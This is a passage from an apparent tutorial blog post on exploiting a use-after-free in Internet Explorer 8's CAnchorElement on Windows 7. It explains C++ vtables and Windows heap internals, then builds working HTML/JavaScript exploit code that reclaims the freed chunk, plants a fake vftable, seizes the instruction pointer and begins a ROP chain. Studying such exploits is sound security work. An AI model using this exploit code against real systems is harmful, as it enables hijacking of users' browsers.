
The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Its general purpose is that they are used so that variables can be initialized within a class, whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating objects that point to a classOne class, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* cl in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as is in our case, the delete operator is invoked against one of the previously declared class objects (cl and cl_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
  int var1;
  int var2;
}

As you know, the first member of this struct is int var1. The same bodes true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exists, is it allows a developer to prototype a function in a main class, but allows for the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t to until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

As we recall from a few images ago, where we dumped the table and saw our two virtual function addresses. We can see that this time program execution is going to invoke this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction this time!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since we only created two classOne objects, and we are only deleting those two objects, we know that only the classOne destructor will be called, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the UCRTBASED Windows API function _free_dbg, to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  c1->sharedFunction();
  c1_2->sharedFunction();

  delete c1;
  delete c1_2;

  // Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
  c1->sharedFunction();
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configured WinDbg to automatically attach and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. glfags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourself with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr -The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here, comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be considered techniques leveraging the heap internals here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP)structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.

In any event, it is still worth talking about the LFH in its entierty, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap manager, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code first, as to the actual root cause, which is that when a CPhraseElement’s outerText property is reset (freed). However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contains a similar proof of concept above. Note that although the elements described are not the same name as the elements in the HTML, note that when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically how we did earlier, to identify if we can’t see why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unsassembly the current instruction pointer, we can see something that is very reminiscent of our assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x18, entry 4 would be 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the a fetching of the vptr via [ecx]. The vptr is loaded into ECX and then is dereferenced, storing the pointer into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take the pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (which ever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from ECX. Since this is a pointer to the table, which was allocated by the heap, this is technically a pointer to the heap chunk. Even though the memory is in a free state, it is still pointed to by the value [ecx] in this case, which is the vptr. It is only until we dereference the memory can we see this chunk is actually invalid.

Moving on, take a look at the call stack we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vuln.exe, and vuln.exe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class actually is handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which is simply a list of function calls that have resulted to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit, is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we could like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that way we can fill this freed chunk with out own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, functions arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is again, a handle to an existing heap. The second, are any flags you would like to set on the heap allocation. The third, and most importantly for us, is the actual size of the heap. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger taking over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!

#

This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now allocates the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx] takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced again, which points to the virtual function table, and is called at a specified offset. Notice how currently we control the ECX register, which is used to hold the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that was previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, with 0x70 entries? What we could do is, with our primitive to control the vptr, we could replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create 70 pointers (think of this as 70 “fake functions”) and then have the vptr we control point to the virtual function table.

By program design, the program execution would naturally dereference our fake virtual function table, it would fetch whatever is at our fake virtual function table at an offset of 0x70, and it would invoke it! The goal from here is to construct our own vftable and to make the 70th “function” in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method to just simply avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit, the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially what this HTML+TIME “method”, which only works for IE8, does is instead of just placing 0x68 bytes of memory to fill up our heap, which still results in a crash because we are not supplying pointers to anything, just raw data, we can actually create an array of 0x68 pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is something that is an alternative, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities and how to determine the size of a freed allocation and how to properly fill it. This specific technique is not applicable today, as well. However, this is the beginning of myself learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now controlled this freed chunk with our user-supplied 0x68 byte chunk.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the 70th member to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx]   ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]  ; This takes the vptr, dereferences it to obtain a pointer to the virtual function table at an offset of 0x70, and stores it in EDX
call edx       ; The function is called

So what happened here is that we loaded our heap chunk, that replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers to either the fake virtual function table (the 1st pointer) or a pointer to the string vftable(the 2nd pointer and so on). This can be seen in the image below (In WinDbg poi() will dereference what is within parentheses and display it).

This value in ECX, which is a pointer to our fake vtable, is also placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and constructing our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists

Let’s set update our POC with this ROP gadget, in place of the former 42424242 DWORD that is in place of our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
  <script>

    window.onload = function() {

      // Create the fake vftable of 70 DWORDS (70 "functions")
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
      {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
        {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        }
        else
        {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
      {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      /*
      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
      {
        fillAlloc += "\u4242\u4242";
      }

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;
      */

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};

  </script>
    <table>
      <tr>
        <div>
          <span>
            <q id='a'>
              <a>
                <td></td>
              </a>
            </q>
          </span>
        </div>
      </tr>
    </table>
ss
</html>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable of 70 DWORDS (70 "functions")
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else
{
  vftable+= unescape("\u4141\u4141");
}
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack that is our original xchg eax, esp instruction. Because of this, we will need to actually start our ROP chain after this pointer, since it already has been executed. This means that our ROP gadget should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will just continue to use WinDbg as our postmortem debugger for the time being, and making changes to our ROP chain, then viewing the state of the debugger to see our results. When necessary, we will start debugging the parent process of Internet Explorer and then WinDbg to identify the correct child process and then debug it in order to properly analyze our exploit.

